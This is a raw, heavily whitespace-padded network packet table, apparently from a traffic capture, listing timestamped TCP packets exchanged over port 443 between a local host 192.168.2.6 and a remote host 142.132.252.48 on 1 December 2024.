                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.173635006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.173675060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.173675060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.224601984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.331943035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.331965923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.332103014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.332113028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.332165956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.337368011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.337385893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.337543964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.337552071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.337661028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.347594976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.347613096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.347728014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.347735882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.347793102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.353535891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.353552103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.353699923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.353708029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.353771925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.359889984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.359905958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.359961987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.359970093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.360021114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.363898039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.363914013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.363993883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.364001989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.364639997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.369869947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.369885921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.370214939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.370222092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.371125937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.375413895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.375427961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.375477076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.375490904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.375500917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.375598907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.395899057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.532776117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.532798052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.532924891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.532937050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.533068895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.538645029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.538660049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.538830996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.538845062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.538934946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.549061060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.549078941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.549200058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.549206972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.549472094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.554661989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.554681063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.554743052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.554775953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.554832935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.559631109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.559648037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.559715033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.559715033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.559730053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.559779882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.565439939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.565459967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.565551043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.565560102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.565841913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.570998907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.571016073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.571080923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.571105003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.571156025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.576680899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.576695919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.576797962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.576805115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.576874018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.580518007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.734762907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.734786987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.734874964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.734894037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.734930038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.734997988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.739752054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.739769936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.739857912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.739876032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.739897966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.739939928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.750608921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.750628948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.750761032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.750761032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.750770092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.750853062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.755361080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.756237030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.756254911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.756315947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.756321907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.756352901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.756378889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.761287928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.761307001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.761378050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.761378050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.761384964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.761578083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.767498016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.767524004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.767561913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.767566919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.767612934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.767612934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.772527933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.772547007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.772608042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.772614002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.772650003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.772677898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.777508974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.777527094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.777601957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.777601957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.777615070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.780678034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.797306061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.935879946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.935900927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.935971022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.935981989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.936090946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.936090946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.941559076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.941581011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.941673040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.941682100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.941700935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.941797018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.951807022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.951827049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.951910973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.951910973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.951925993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.952622890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.957613945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.957636118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.957700014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.957700014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.957707882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.958636045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.962558985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.962578058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.962654114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.962662935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.962887049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.968313932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.968332052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.968381882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.968394995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.968621969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.973949909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.973965883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.974153996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.974153996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.974165916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.976043940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.979573011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.979592085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.979660988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.979666948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.979721069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.979721069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:44.990717888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.137168884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.137188911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.137259007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.137276888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.138717890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.142924070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.142944098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.142992973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.142999887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.143034935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.143163919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.153084993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.153105021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.153170109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.153177977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.153259039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.154648066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.158608913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.158627987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.158674002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.158679008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.158709049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.158709049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.164361954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.164383888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.164526939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.164526939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.164534092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.164583921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.169394970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.169418097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.169492006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.169500113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.170649052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.175086021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.175105095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.175144911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.175157070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.175194025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.175194025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.180881023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.180905104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.180947065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.180953026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.180969000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.181016922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.339045048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.339067936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.339238882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.339256048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.340662956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.343548059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.343566895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.343646049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.343666077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.344624996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.354585886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.354604959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.354684114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.354700089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.355535984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.360100985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.360119104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.360171080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.360179901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.360619068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.365844965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.365864038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.365909100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.365922928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.365976095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.365976095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.370841026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.370860100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.370939970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.370955944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.371006012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.376589060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.376606941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.376667976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.376688004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.376780987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.382380009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.382397890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.382488966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.382500887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.382544041 CET49721443192.168.2.6142.132.252.48
